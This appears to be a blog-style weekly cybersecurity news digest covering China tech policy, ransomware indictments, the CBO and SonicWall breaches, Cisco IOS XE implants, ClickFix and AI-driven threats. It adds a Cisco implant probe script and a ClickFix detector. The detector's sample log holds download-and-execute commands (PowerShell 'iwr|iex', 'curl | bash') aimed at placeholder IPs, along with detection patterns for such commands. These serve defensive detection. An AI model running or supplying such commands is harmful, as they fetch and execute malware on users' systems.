From the cybersecurity policy and law enforcement front,
- Cyberscoop reports,
- “Congressional leaders are pressing federal agencies to provide more information on their plans to compete with China on a range of tech and cybersecurity issues, including a strategy for promoting American 6G telecommunications infrastructure and limiting Chinese tech in US supply chains.
- “Representative Raja Krishnamoorthi, D-Ill., ranking member on the House Select Committee on the Chinese Communist Party, wrote to Secretary of State Marco Rubio last week asking for an update on the department’s work building international coalitions around 6G.
- “In the letter, dated Oct. 30 and shared exclusively with CyberScoop, he called for the department to share details on how it is fighting to shape international norms, global technical standards and supply chains in favor of U.S. and non-Chinese companies and technologies, saying “diplomacy can, and must, play a key role in this strategy.”
- “While it remains essential that we continue to address the threats posed by the Chinese Communist Party’s efforts to dominate 5G, we must also look forward to how we can outcompete the CCP in the next frontier of wireless competition,” he wrote.”
- HIPAA Journal tells us,
- “Two U.S. nationals have recently been indicted for using BlackCat ransomware to attack targets in the United States. A third individual is suspected of involvement but was not included in the indictment. All three individuals worked at cybersecurity companies and conducted the attacks while they were employed there.
- “Ryan Clifford Goldberg was employed by the cybersecurity firm Sygnia as an incident response professional, and Kevin Tyler Martin and an unnamed co-conspirator were both employed by the Chicago-based cyber threat intelligence and incident response firm DigitalMint as ransomware threat negotiators.
- “The two indicted individuals are alleged to have engaged in a conspiracy to enrich themselves by breaching company networks, stealing their data, using ransomware to encrypt files, and extorting the companies to obtain cryptocurrency payments. A medical device company was attacked on or around May 13, 2023, resulting in a $10 million ransom demand. The medical device company negotiated and paid a $1,274,000 ransom payment.
- “A pharmaceutical company was also attacked in May 2023, but the ransom demand was not disclosed. Then came a July 2023 attack on a doctor’s office in California, which included a $5,000,000 ransom demand. In October 2023, an engineering company was attacked and told to pay $1 million, then in November 2023, a drone manufacturer in Virginia was attacked, and the defendants allegedly demanded a $300,000 ransom payment. Only the medical device company paid the ransom.”
- Cyberscoop adds,
- “A 25-year-old Russian national pleaded guilty to multiple charges stemming from their participation in ransomware attacks and faces a maximum penalty of up to 53 years in prison.
- “Aleksei Olegovich Volkov, also known as “chubaka.kor,” served as the initial access broker for the Yanluowang ransomware group while living in Russia from July 2021 through November 2022, according to court records. Prosecutors accuse Volkov and unnamed co-conspirators of attacking seven U.S. businesses during that period, including two that paid a combined $1.5 million in ransoms.
- “The victims, which included an engineering firm and a bank, said executives received harassing phone calls and their networks were hit with distributed denial of service attacks after their data was stolen and encrypted by Yanluowang ransomware operators.”
From the cybersecurity breaches and vulnerabilities front,
- Cyberscoop reports,
- “A federal agency that supplies budget and economic information to Congress has suffered a cybersecurity incident, reportedly at the hands of a suspected foreign party.
- “A spokesperson for the Congressional Budget Office (CBO) acknowledged the incident Thursday [November 6] after The Washington Post reported that the office was hacked, with the attackers potentially accessing communications between lawmakers and researchers at the agency.
- “The Congressional Budget Office has identified the security incident, has taken immediate action to contain it, and has implemented additional monitoring and new security controls to further protect the agency’s systems going forward,” said the CBO spokesperson, Caitlin Emma.”
- and
- “SonicWall said a state-sponsored threat actor was behind the brute-force attack that exposed firewall configuration files of every customer that used the company’s cloud backup service.
- “The vendor pinned the responsibility for the attack on an undisclosed nation state Tuesday, after Mandiant concluded its investigation into the incident.
- “SonicWall did not attribute the attack to a specific country or threat group and Mandiant declined to provide additional information. The vendor’s update, which lacked a root-cause analysis, was mostly an effort to put the attack behind it as leadership made pledges to improve SonicWall’s security practices.”
- The Cybersecurity and Infrastructure Security Agency added two known exploited vulnerabilities to its catalog this week.
- November 4, 2025
- CVE-2025-11371 Gladinet CentreStack and Triofox Files or Directories Accessible to External Parties Vulnerability
- CVE-2025-48703 CWP Control Web Panel OS Command Injection Vulnerability
- The Hacker News discusses these KEVs here.
- Cybersecurity Dive informs us,
- “Critical flaws in Microsoft Teams can be used to allow an attacker to manipulate messages, spoof notifications and even impersonate executives, according to a report released Tuesday by Check Point Research.
- “Researchers found four vulnerabilities that allow attackers, including external hackers and malicious insiders, to manipulate Teams messages, conduct business email compromise or forge identities in video calls or phone messages.
- “Researchers found that attackers could conduct four specific types of attacks:
- “Attackers could edit Teams messages without leaving the “edited” label behind in the message.
- “Message notifications could be manipulated so that they appeared to be from another sender.
- “Attackers could change the display name inside private chats.
- “Caller identities could be altered in video and audio calls.”
- and
- “A critical vulnerability in Cisco IOS XE is being exploited to install an implant called BadCandy in a renewed wave of attacks, according to warnings from Australian government authorities and multiple security researchers.
- “State-linked and criminal hackers have been abusing the vulnerability, tracked as CVE-2023-20198, to install BadCandy in targeted systems since 2023, and have periodically renewed those attacks in waves.” * * *
- “Shadowserver Foundation on Monday warned that threat activity is widespread across the globe, with more than 15,000 devices with backdoor implants remaining visible.”
- “The vulnerability, tracked as CVE-2023-20198, abuses the web user interface in Cisco IOS XE software and has a severity score of 10. It was previously disclosed as a zero-day in 2023, with more than 42,000 devices exploited.”
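A practitioner reading the item above will want a way to find implanted devices in their own estate. The script below is an added example, not code from Cisco, Cybersecurity Dive or the Shadowserver Foundation; it reproduces the indicator Cisco Talos published in 2023: a device carrying the implant answers a POST to `/webui/logoutconfirm.html?logon_hash=1` with a bare hexadecimal string, whereas a clean web UI returns HTML or an error. The minimum hex length, the host list and the optional `auth_header` parameter are assumptions; later implant variants only respond when a specific `Authorization` header is present, so supply that value from the vendor advisory if the plain probe is silent on a device you otherwise suspect.

```python
"""Probe Cisco IOS XE devices for the CVE-2023-20198 web UI implant (BadCandy).

Added example; not Cisco's tooling. Stdlib only, so it runs from an IR jump
host without extra packages. TLS verification is disabled on purpose because
device web UIs almost always present self-signed certificates.
"""
import re
import ssl
import sys
import urllib.error
import urllib.request

IMPLANT_PATH = "/webui/logoutconfirm.html?logon_hash=1"
# The implant echoes a bare hex token; the exact length is not specified in
# public write-ups, so 8+ hex characters is an assumption chosen to avoid misses.
HEX_RE = re.compile(r"[0-9a-fA-F]{8,}")


def looks_like_implant_reply(body: bytes) -> bool:
    """True when the response body is nothing but a hex token (implant present)."""
    text = body.decode("utf-8", "replace").strip()
    return HEX_RE.fullmatch(text) is not None


def probe_device(host: str, auth_header: str = "", timeout: float = 5.0) -> dict:
    """POST the documented probe and classify the answer.

    auth_header: value for the Authorization header that later implant
    variants require before they answer (assumed to come from your playbook).
    """
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE  # self-signed device certificates
    req = urllib.request.Request(f"https://{host}{IMPLANT_PATH}", data=b"", method="POST")
    if auth_header:
        req.add_header("Authorization", auth_header)
    try:
        with urllib.request.urlopen(req, timeout=timeout, context=ctx) as resp:
            body, status = resp.read(), resp.status
    except urllib.error.HTTPError as err:  # 4xx/5xx still carry a body worth inspecting
        body, status = err.read(), err.code
    except (urllib.error.URLError, OSError) as err:
        return {"host": host, "reachable": False, "implant": False, "error": str(err)}
    return {"host": host, "reachable": True, "status": status,
            "implant": looks_like_implant_reply(body)}


if __name__ == "__main__":
    # Usage: python probe.py <host-or-ip> [<host-or-ip> ...]
    for target in sys.argv[1:]:
        result = probe_device(target)
        flag = "IMPLANT" if result["implant"] else ("clean" if result["reachable"] else "unreachable")
        print(f"{target}: {flag} {result}")
```

Two caveats a responder should pair with this check: the implant lives in memory, so a reboot removes it, but the privilege-15 local account the attackers create through CVE-2023-20198 persists in the configuration and must be found (`show running-config`) and removed separately; and a negative probe does not prove the device was never compromised, only that this particular implant is not answering, so still upgrade to a fixed IOS XE release and take the web UI off the internet.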
- Security Week lets us know,
- “ClickFix attacks continue to evolve and the technique appears to be increasingly used against macOS users, with lures becoming ever more convincing.
- “ClickFix has been widely adopted by both profit-driven cybercriminals and state-sponsored threat groups.
- “The social engineering tactic enables attackers to trick victims into inadvertently executing malicious commands, particularly ones that lead to the deployment of malware.
- “An attack involves a fake error message being displayed, informing the targeted user that in order to ‘fix’ the issue they need to click on a button and execute a series of operations.
- “When the user clicks the ‘fix’ or ‘verify’ button in the prompt, a malicious command is copied in the background to their clipboard.
- “On Windows, the victim is then instructed to press the Windows+R keys, which opens the Windows Run dialog box, then press Ctrl+V, which pastes the malicious command from the clipboard into the box, and finally press Enter to execute the command. The command typically runs silently in the background (often by leveraging a legitimate Windows utility such as PowerShell), downloading and installing a piece of malware.”
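The sequence described above (fake error, clipboard hijack, Win+R, Ctrl+V, Enter) leaves a recognisable trail in process-creation telemetry: an interpreter spawned by explorer.exe (the parent of anything launched from the Run dialog) or by a terminal on macOS, with a command line carrying download, hidden-window or encoded-command flags. The detector below is an added example, not SecurityWeek's or the original post's code; its tab-separated log format, the field names and the events in `SAMPLE_LOG` are constructed assumptions, with addresses drawn from documentation ranges.

```python
"""Heuristic ClickFix detector for process-creation telemetry.

Added example (not from SecurityWeek or the original post). The log format
(tab-separated: timestamp, parent image, image, command line) and the events
in SAMPLE_LOG are constructed for illustration. In a real pipeline, map Sysmon
Event ID 1 or EDR process-start fields onto parse_line() and stream lines
into detect().
"""
import re
from dataclasses import dataclass, field

# Parents the pasted command is launched from: the Windows Run dialog (a child
# of explorer.exe) and the macOS terminal a lure tells the victim to open.
INTERACTIVE_PARENTS = {"explorer.exe", "terminal", "iterm2"}

# Interpreters and downloaders the pasted command typically invokes.
SUSPICIOUS_IMAGES = {
    "powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "curl.exe",
    "bash", "sh", "zsh", "osascript",
}

# Command-line indicators seen in ClickFix payloads: encoded command, hidden
# window, remote download, download piped to a shell, and the fake CAPTCHA
# comment that makes the Run dialog contents look benign to the victim.
INDICATORS = [
    (r"(?i)-(?:enc|encodedcommand|e)\s+[A-Za-z0-9+/=]{20,}", "encoded PowerShell"),
    (r"(?i)-w(?:indowstyle)?\s+hidden", "hidden window"),
    (r"(?i)\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring)\b", "PowerShell download"),
    (r"(?i)\bmshta(?:\.exe)?\s+https?://", "mshta remote HTA"),
    (r"(?i)\bcurl\b[^|]*\|\s*(?:bash|sh|zsh)\b", "curl piped to shell"),
    (r"(?i)\bbase64\s+(?:-d|--decode)\b", "base64 decode"),
    (r"(?i)i\s?am\s?not\s?a\s?robot|captcha|verification", "fake CAPTCHA / verification text"),
]


@dataclass
class Finding:
    ts: str
    parent: str
    image: str
    reasons: list = field(default_factory=list)


def _basename(path: str) -> str:
    """Last path component, lower-cased, for either Windows or POSIX paths."""
    return path.rsplit("\\", 1)[-1].rsplit("/", 1)[-1].lower()


def parse_line(line: str) -> dict:
    ts, parent, image, cmdline = line.rstrip("\n").split("\t", 3)
    return {"ts": ts, "parent": parent, "image": image, "cmdline": cmdline}


def score_event(ev: dict):
    """Return (parent-chain reason or None, list of command-line indicator labels)."""
    parent, image = _basename(ev["parent"]), _basename(ev["image"])
    chain = None
    if parent in INTERACTIVE_PARENTS and image in SUSPICIOUS_IMAGES:
        chain = f"{image} launched from {parent}"
    hits = [label for pattern, label in INDICATORS if re.search(pattern, ev["cmdline"])]
    return chain, hits


def detect(lines):
    """Alert when the interactive-parent chain carries any payload indicator,
    or when two or more indicators appear regardless of parent. A plain admin
    PowerShell launched from the Run dialog therefore does not alert."""
    findings = []
    for line in lines:
        ev = parse_line(line)
        chain, hits = score_event(ev)
        if (chain and hits) or len(hits) >= 2:
            findings.append(Finding(ev["ts"], ev["parent"], ev["image"],
                                    ([chain] if chain else []) + hits))
    return findings


# Constructed sample telemetry (not real captures); IPs are documentation ranges.
SAMPLE_LOG = [
    "2025-11-06T14:02:11Z\tC:\\Windows\\explorer.exe\tC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\t"
    "powershell -w hidden -c iwr('http://198.51.100.7/update.ps1')|iex  # I am not a robot - reCAPTCHA Verification ID: 7811",
    "2025-11-06T14:03:40Z\tC:\\Windows\\explorer.exe\tC:\\Windows\\System32\\notepad.exe\tnotepad.exe C:\\Users\\alice\\notes.txt",
    "2025-11-06T14:04:12Z\tC:\\Windows\\explorer.exe\tC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\t"
    "powershell -NoProfile -File C:\\scripts\\backup.ps1",
    "2025-11-06T14:05:02Z\t/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal\t/bin/bash\t"
    "bash -c \"curl -fsSL http://203.0.113.9/fix.sh | bash\"",
    "2025-11-06T14:06:30Z\tC:\\Windows\\System32\\cmd.exe\tC:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\t"
    "powershell.exe -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA",
]

if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f.ts, _basename(f.image), "<-", _basename(f.parent), "|", "; ".join(f.reasons))
```

The two-condition rule is deliberate: the parent/child pair alone is noisy (administrators do open PowerShell from Run, as the third sample shows), and a single indicator such as a long base64 token can be legitimate, so the detector requires either the chain plus one indicator or two indicators on their own. On Windows the `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU` key keeps a history of what was typed or pasted into the Run dialog and is worth collecting alongside this telemetry during triage.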
- Per Cybersecurity Dive,
- “Energy, healthcare, government and transportation saw the biggest surges in cyberattacks targeting Android devices between June 2024 and May 2025, the security firm Zscaler said in a report published on Wednesday.
- “Agriculture, IT and education saw some of the biggest drops in attacks on Android devices, according to the report.
- “Manufacturing, which also saw a significant increase in 2025, accounted for 26% of all cyberattacks on Android devices that Zscaler tracked.”
- and
- “Identity-related risks are the biggest danger facing enterprises’ cloud environments, according to a report that ReliaQuest published on Tuesday.
- “Forty-four percent of valid alerts from cloud security tools “were rooted in identity-related weaknesses,” ReliaQuest said, while 33% of all alerts related to identity.
- “Hackers prefer identity-based attacks because they rely on credentials available for cheap on the dark web, they can evade many detection tools and there are so many identities ripe for impersonation, according to the report.”
- and
- “Cyber threat actors have recently begun using AI to develop malware, in a dramatic evolution of the technology’s role in the hacking ecosystem, Google said on Wednesday.
- “New strains of malware use AI to grow and change in real time during the attack phase, potentially making detection and defense much more difficult, Google’s threat intelligence researchers said in a report.
- “The recent trend represents the latest phase in an AI arms race between attackers and defenders.”
- Help Net Security adds,
- “Security leaders are staring down a year of major change. In its Cybersecurity Forecast 2026, Google paints a picture of a threat landscape transformed by AI, supercharged cybercrime, and increasingly aggressive nation-state operations. Attackers are moving faster, scaling their operations with automation.
- “By 2026, AI will be a normal part of everyday attack and defense activity. Adversaries are already using it to automate phishing, clone voices, and shape disinformation.
- “One of the fastest-growing threats is prompt injection, which manipulates AI systems to ignore safeguards and carry out hidden commands. As more companies deploy LLMs inside business processes, these attacks are becoming easier to launch and harder to detect.” * * *
- “The report notes a growing reliance on AI agents, systems that act on their own to complete tasks. These agents will need distinct digital identities and strict access controls. Security programs built for human users will not be enough. Identity management will have to account for AI-driven decision making and temporary task-based privileges.
- “AI is also reshaping security operations. Analysts will soon direct AI tools rather than manually sort through alerts. Instead of reviewing logs, they will examine case summaries and confirm automated containment steps. This shift enables faster response but also brings new oversight challenges.”
From the ransomware front,
- Cybersecurity Dive reports,
- “An August ransomware attack against the state of Nevada has been traced to a May intrusion, when a state employee mistakenly downloaded a malware-laced tool from a spoofed website, according to a forensic report the state released Wednesday.
- “State officials refused to submit to a ransom demand and recovered 90% of the impacted data after a 28-day recovery period. The state had insurance coverage and pre-negotiated vendor agreements, which factored into the decision not to pay a ransom.
- “The threat actor deployed an attack aimed at taking state systems offline and left behind a note with instructions on how to recover the encrypted systems and data, in an attempt to extort the state,” Timothy Galluzzi, chief information officer and executive director of the Governor’s Technology Office, said in the report.” * * *
- “The threat actor, whom the report did not identify, gained access to more than 26,400 files. Another 3,200 files were left exposed across multiple systems. The state incurred about $1.3 million in expenses related to recovery costs, as they engaged several major companies to help investigate and restore agency services, including Mandiant, Dell, Microsoft DART, Palo Alto Networks, Aeris and other firms.”
- TechCrunch informs us,
- “The Washington Post has said that it was one of the victims of a hacking campaign tied to Oracle’s suite of corporate software apps.
- “Reuters first reported the news on Friday [November 7], citing a statement from the newspaper that said it was affected “by the breach of the Oracle E-Business Suite platform.”
- “A spokesperson for the Post did not immediately respond to TechCrunch’s request for comment.” * * *
- “On Thursday [November 6], Clop claimed on its website that it had hacked The Washington Post, claiming that the company “ignored their security,” language that the Clop gang typically uses when the victim does not pay the hackers.
- “It’s not uncommon for ransomware or extortion gangs like Clop to publicize the names and stolen files of their victims as a pressure tactic, which can suggest that the victim has not negotiated a payment with the gang, or the negotiation broke down.
- “Several other organizations have confirmed they are affected by the Oracle E-Business hacks, including Harvard University and American Airlines subsidiary Envoy.”
- The Hacker News tells us,
- “Cybersecurity researchers have flagged a malicious Visual Studio Code (VS Code) extension with basic ransomware capabilities that appears to be created with the help of artificial intelligence – in other words, vibe-coded.
- “Secure Annex researcher John Tuckner, who flagged the extension “susvsex,” said it does not attempt to hide its malicious functionality. The extension was uploaded on November 5, 2025, by a user named “suspublisher18” along with the description “Just testing” and the email address “donotsupport@example[.]com.”
- “Automatically zips, uploads, and encrypts files from C:\Users\Public\testing (Windows) or /tmp/testing (macOS) on first launch,” reads the description of the extension. As of November 6, Microsoft has stepped in to remove it from the official VS Code Extension Marketplace.”
- Tech Radar points out,
- “[Ransomware gang] Rhysida spoofed Microsoft Teams ads on Bing to deliver malware via fake download pages
- “Victims received OysterLoader and Latrodectus, which deploy ransomware, backdoors, and infostealers
- “Group operates on RaaS model; past targets include airports, libraries, and U.S. school districts.”
From the cybersecurity business and defenses front,
- Cyberscoop reports,
- “Cloud security company Zscaler [November 3] announced Monday it has acquired SplxAI, an artificial intelligence security platform, in a move to strengthen its ability to protect enterprise AI assets.
- “Terms were not disclosed.
- “Zscaler said the purchase is aimed at enhancing its zero-trust security offerings by integrating Splx’s technology for AI asset discovery, automated red-teaming, and governance. The company said these features will help secure AI applications and services during development and after deployment.
- “AI is creating enormous value, but its full potential can only be realized when it can be secured,” Zscaler CEO Jay Chaudhry said in a statement.”
- Security Week adds,
- “Google and Wiz said the antitrust review initiated by the United States Department of Justice into their planned $32 billion acquisition has been cleared.
- “The companies announced reaching an agreement on the terms of an acquisition in March 2025.
- “News of a Justice Department antitrust review into Google’s planned acquisition of the cloud security giant came to light in mid-June. The goal of the probe was to determine whether the deal would harm competition in the cybersecurity market.
- “During the recent WSJ Tech Live California event, Wiz CEO Assaf Rappaport confirmed that his company had cleared the regulatory hurdle, noting they are “still in the journey between signing and closing.”
- Dark Reading offers a commentary about “Closing the AI Execution Gap in Cybersecurity — A CISO Framework. CISOs must navigate five critical dimensions of AI in cybersecurity: augmenting security with AI, automating security with AI, protecting AI systems, defending against AI-powered threats, and aligning AI strategies with business goals. Neglecting any of these areas is a recipe for disaster.”
- Here’s a link to Dark Reading’s CISO Corner.
